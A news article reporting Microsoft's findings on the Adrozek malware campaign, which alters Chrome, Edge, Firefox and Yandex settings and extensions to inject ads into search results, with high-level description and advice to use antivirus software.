The malware gets installed just like other programmes and can be accessed through Apps settings and gets registered as Windows service with the same name playing down chances of it getting caught by anti-virus software.
Malware identified as ‘Adrozek’ has been targeting 30,000 devices every day since May this year. (Representative Image)
Most popular browsers like Google Chrome, Microsoft Edge, Firefox and Yandex has become home to a new malware campaign that are targeting user domains to inject malicious browser extensions and ads into their search results. According to Microsoft blog post, the malware identified as ‘Adrozek’ has been targeting 30,000 devices every day since May this year and attacks peaked in August 2020.
Microsoft researcher teams have already tracked 159 unique domains that were hosting on an average 17,300 unique domains that launched on an average 15, 300 distinct malware samples. According to Microsoft, the aim of the malware campaign is to make vulnerable user visit affiliated pages by serving malware-injected ads on search results. But before that, the malware first changes the browser settings adds extensions to insert illegitimate adds on the top of the actual ads from search engine. The malware can also take over the security control features of MsEdge.dll on Microsoft Edge.
Androzek gets installed just like other programmes and can be accessed through Apps settings and gets registered as Windows service with the same name playing down chances of it getting caught by anti-virus software in use in the system. Once installed, it modifies a typical Google Chrome Media Router extension. For other browsers like Yandex and Microsoft Edge, it finds its host in legitimate browser extensions.
The malware campaign further adds the same malware script to all the browser extensions helping attackers to establish a secure connection with the device and fetch additional script using which they can inject illegitimate adds in search results. The malware also changes system setting get additional control not letting the browser to update itself. “In the past, browser modifiers calculated the hashes like browsers do and update the Secure Preferences accordingly. Adrozek goes one step further and patches the function that launches the integrity check,” the Microsoft blog post said.
The Adrozek attacks are mostly happening on systems used in Europe, South East Asia and South Asia. The campaign can extent to other geographies as well. To stop your system from falling prey to the malware attack, Microsoft researchers suggested and anti-virus programme like Microsoft defender Antivirus that has an in-built behaviour-based, machine learning-powered mechanism to detect malware families like Adrozek that only target Windows using systems. Machines using macOS and Linux Operating systems, however, are safe from the malware attack.
Earlier this year, Microsoft and Google detected a list of extensions that were illegitimately inserting ads to search engine results and restricted their operations on Web Stores. Microsoft, however, will require a tougher approach to deal with such new kinds of malicious malware threats like Adrozek.